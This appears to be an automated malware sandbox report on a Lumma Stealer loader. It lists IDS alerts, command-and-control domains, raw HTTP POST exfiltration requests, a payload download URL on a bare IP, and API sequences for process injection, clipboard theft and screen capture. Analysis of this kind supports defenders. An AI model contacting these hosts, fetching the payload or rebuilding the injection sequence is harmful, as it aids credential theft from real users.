                          Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49709 -> 104.21.32.1:443
                          Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49705 -> 104.21.32.1:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 104.21.32.1:443
                          C2 URLs / IPs found in malware configuration
                          Source: Malware configuration extractorURLs: noisycuttej.shop
                          Source: Malware configuration extractorURLs: framekgirus.shop
                          Source: Malware configuration extractorURLs: nearycrepso.shop
                          Source: Malware configuration extractorURLs: wholersorie.shop
                          Source: Malware configuration extractorURLs: fancywaxxers.shop
                          Source: Malware configuration extractorURLs: abruptyopsn.shop
                          Source: Malware configuration extractorURLs: tirepublicerj.shop
                          Source: Malware configuration extractorURLs: rabidcowse.shop
                          Source: Malware configuration extractorURLs: cloudewahsj.shop
                          Source: Joe Sandbox ViewIP Address: 104.21.32.1 104.21.32.1
                          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                          Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49705 -> 104.21.32.1:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49704 -> 104.21.32.1:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49707 -> 104.21.32.1:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49709 -> 104.21.32.1:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49715 -> 104.21.32.1:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49716 -> 104.21.32.1:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49717 -> 104.21.32.1:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49714 -> 104.21.32.1:443
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fancywaxxers.shop
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 53Host: fancywaxxers.shop
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=AMTB3QLKBFJ98IVUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12823Host: fancywaxxers.shop
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=7E5OXTHN8747PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15053Host: fancywaxxers.shop
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=CVKA9J29E8AUJ7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20549Host: fancywaxxers.shop
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=4H4JHYC6MWK5EZIZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1280Host: fancywaxxers.shop
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=L5A4SY5A1OSHVBRM0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 586242Host: fancywaxxers.shop
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 88Host: fancywaxxers.shop
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: global trafficDNS traffic detected: DNS query: fancywaxxers.shop
                          Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fancywaxxers.shop
                          Source: aspnet_regiis.exe, 00000003.00000003.2740892244.0000000002B01000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3271562153.0000000002B0F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2140838210.0000000002B0A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2140838210.0000000002AFF000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2141010359.0000000002B0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.81/conhost.exe
                          Source: aspnet_regiis.exe, 00000003.00000003.2068440154.0000000004F49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                          Source: aspnet_regiis.exe, 00000003.00000003.2068440154.0000000004F49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                          Source: aspnet_regiis.exe, 00000003.00000003.2068440154.0000000004F49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                          Source: aspnet_regiis.exe, 00000003.00000003.2068440154.0000000004F49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                          Source: aspnet_regiis.exe, 00000003.00000003.2068440154.0000000004F49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                          Source: aspnet_regiis.exe, 00000003.00000003.2068440154.0000000004F49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                          Source: aspnet_regiis.exe, 00000003.00000003.2068440154.0000000004F49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                          Source: aspnet_regiis.exe, 00000003.00000003.2068440154.0000000004F49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                          Source: aspnet_regiis.exe, 00000003.00000003.2068440154.0000000004F49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                          Source: Amcache.hve.6.drString found in binary or memory: http://upx.sf.net
                          Source: aspnet_regiis.exe, 00000003.00000003.2068440154.0000000004F49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                          Source: aspnet_regiis.exe, 00000003.00000003.2068440154.0000000004F49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                          Source: aspnet_regiis.exe, 00000003.00000003.2040127622.0000000004F5A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2040597834.0000000004F57000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2040416367.0000000004F57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                          Source: aspnet_regiis.exe, 00000003.00000003.2070941631.0000000004F37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
                          Source: aspnet_regiis.exe, 00000003.00000003.2070941631.0000000004F37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
                          Source: aspnet_regiis.exe, 00000003.00000003.2040127622.0000000004F5A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2040597834.0000000004F57000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2040416367.0000000004F57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                          Source: aspnet_regiis.exe, 00000003.00000003.2040127622.0000000004F5A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2040597834.0000000004F57000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2040416367.0000000004F57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                          Source: aspnet_regiis.exe, 00000003.00000003.2040127622.0000000004F5A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2040597834.0000000004F57000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2040416367.0000000004F57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                          Source: aspnet_regiis.exe, 00000003.00000003.2070941631.0000000004F37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                          Source: aspnet_regiis.exe, 00000003.00000003.2070941631.0000000004F37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
                          Source: aspnet_regiis.exe, 00000003.00000003.2040127622.0000000004F5A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2040597834.0000000004F57000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2040416367.0000000004F57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                          Source: aspnet_regiis.exe, 00000003.00000003.2040127622.0000000004F5A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2040597834.0000000004F57000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2040416367.0000000004F57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                          Source: aspnet_regiis.exe, 00000003.00000003.2040127622.0000000004F5A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2040597834.0000000004F57000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2040416367.0000000004F57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                          Source: aspnet_regiis.exe, 00000003.00000003.2100987956.0000000002B0D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2053645205.0000000002B1D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3271562153.0000000002B0F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2140838210.0000000002B0A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2101109857.0000000002AE8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2141010359.0000000002B0D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2101077815.0000000002B1D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2065068299.0000000002AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/
                          Source: aspnet_regiis.exe, 00000003.00000003.2063582512.0000000004F30000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2064491018.0000000004F34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/X
                          Source: aspnet_regiis.exe, 00000003.00000003.2053645205.0000000002B1D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2065068299.0000000002AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/YB
                          Source: aspnet_regiis.exe, 00000003.00000003.2740892244.0000000002B01000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2140838210.0000000002AFF000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2052375536.0000000004F97000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2052400393.0000000004F99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/api
                          Source: aspnet_regiis.exe, 00000003.00000002.3271176576.0000000002A6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/api9Bd
                          Source: aspnet_regiis.exe, 00000003.00000002.3271176576.0000000002A6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/apiAB
                          Source: aspnet_regiis.exe, 00000003.00000003.2740892244.0000000002B01000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2140838210.0000000002AFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/api_
                          Source: aspnet_regiis.exe, 00000003.00000002.3271176576.0000000002A6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/int32
                          Source: aspnet_regiis.exe, 00000003.00000002.3271176576.0000000002A6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/n
                          Source: aspnet_regiis.exe, 00000003.00000003.2070941631.0000000004F37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                          Source: aspnet_regiis.exe, 00000003.00000003.2070475560.000000000504A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                          Source: aspnet_regiis.exe, 00000003.00000003.2070475560.000000000504A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                          Source: aspnet_regiis.exe, 00000003.00000003.2070941631.0000000004F37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
                          Source: aspnet_regiis.exe, 00000003.00000003.2070941631.0000000004F37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
                          Source: aspnet_regiis.exe, 00000003.00000003.2040127622.0000000004F5A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2040597834.0000000004F57000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2040416367.0000000004F57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                          Source: aspnet_regiis.exe, 00000003.00000003.2040127622.0000000004F5A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2040597834.0000000004F57000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2040416367.0000000004F57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                          Source: aspnet_regiis.exe, 00000003.00000003.2070475560.000000000504A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
                          Source: aspnet_regiis.exe, 00000003.00000003.2070475560.000000000504A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
                          Source: aspnet_regiis.exe, 00000003.00000003.2070475560.000000000504A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                          Source: aspnet_regiis.exe, 00000003.00000003.2070475560.000000000504A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                          Source: aspnet_regiis.exe, 00000003.00000003.2070475560.000000000504A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                          Source: aspnet_regiis.exe, 00000003.00000003.2070475560.000000000504A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                          Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49704 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49705 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49707 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49709 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49714 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49715 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49716 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49717 version: TLS 1.2
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02792590 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,3_2_02792590
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_04D01000 EntryPoint,GetClipboardSequenceNumber,Sleep,Sleep,OpenClipboard,GetClipboardData,GlobalLock,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,GlobalUnlock,CloseClipboard,GetClipboardSequenceNumber,3_2_04D01000
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02792590 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,3_2_02792590
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02792700 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,3_2_02792700

                          System Summary

                          barindex
                          PE file contains section with special chars
                          Source: R3nz_Loader.exeStatic PE information: section name: ^]tBD;I
                          PE file has nameless sections
                          Source: R3nz_Loader.exeStatic PE information: section name:
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeCode function: 0_2_6CEE8640 WindowsHandle,GetConsoleWindow,ShowWindow,VirtualAlloc,CreateProcessW,NtGetContextThread,NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtReadVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtCreateThreadEx,NtSetContextThread,NtResumeThread,CloseHandle,CloseHandle,NtAllocateVirtualMemory,NtWriteVirtualMemory,NtReadVirtualMemory,NtWriteVirtualMemory,NtSetContextThread,NtResumeThread,CreateProcessW,CloseHandle,CloseHandle,NtReadVirtualMemory,0_2_6CEE8640
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeCode function: 0_2_6CEE6B80 GetModuleHandleW,NtQueryInformationProcess,0_2_6CEE6B80
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeCode function: 0_2_00A4F4A00_2_00A4F4A0
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeCode function: 0_2_00A37CF00_2_00A37CF0
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeCode function: 0_2_00A4ECD00_2_00A4ECD0
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeCode function: 0_2_00A696200_2_00A69620
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeCode function: 0_2_00A5EC400_2_00A5EC40
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeCode function: 0_2_00A381800_2_00A38180
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeCode function: 0_2_00A4E9F00_2_00A4E9F0
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeCode function: 0_2_00A405200_2_00A40520
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeCode function: 0_2_00A353300_2_00A35330
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeCode function: 0_2_00A373300_2_00A37330
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeCode function: 0_2_00A349100_2_00A34910
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeCode function: 0_2_00A38F600_2_00A38F60
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeCode function: 0_2_00A437600_2_00A43760
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeCode function: 0_2_00A507700_2_00A50770
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeCode function: 0_2_00A68D500_2_00A68D50
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeCode function: 0_2_6CEE86400_2_6CEE8640
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeCode function: 0_2_6CEE6B800_2_6CEE6B80
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeCode function: 0_2_6CEE17400_2_6CEE1740
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeCode function: 0_2_6CEE10000_2_6CEE1000
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeCode function: 0_2_6CEE7D900_2_6CEE7D90
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeCode function: 0_2_6CEFA2F10_2_6CEFA2F1
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeCode function: 0_2_6CEF02500_2_6CEF0250
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeCode function: 0_2_6CEE43E00_2_6CEE43E0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02785A603_2_02785A60
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0276D3E93_2_0276D3E9
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02797BA03_2_02797BA0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027750503_2_02775050
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027978103_2_02797810
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0278208A3_2_0278208A
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0279B1503_2_0279B150
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02782E783_2_02782E78
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0279F6703_2_0279F670
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0278BE6E3_2_0278BE6E
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0277062F3_2_0277062F
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027787FE3_2_027787FE
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027687903_2_02768790
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0276AC503_2_0276AC50
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02771CE03_2_02771CE0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0279ED503_2_0279ED50
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02780D803_2_02780D80
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027662703_2_02766270
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0279E2703_2_0279E270
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027642603_2_02764260
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02774A6F3_2_02774A6F
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0277D2503_2_0277D250
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0278B2443_2_0278B244
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02774A313_2_02774A31
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02780A353_2_02780A35
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0277DA203_2_0277DA20
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0277C22F3_2_0277C22F
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027852103_2_02785210
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02788A003_2_02788A00
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027872003_2_02787200
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027972D03_2_027972D0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0276EAA03_2_0276EAA0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0279DA913_2_0279DA91
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02784B643_2_02784B64
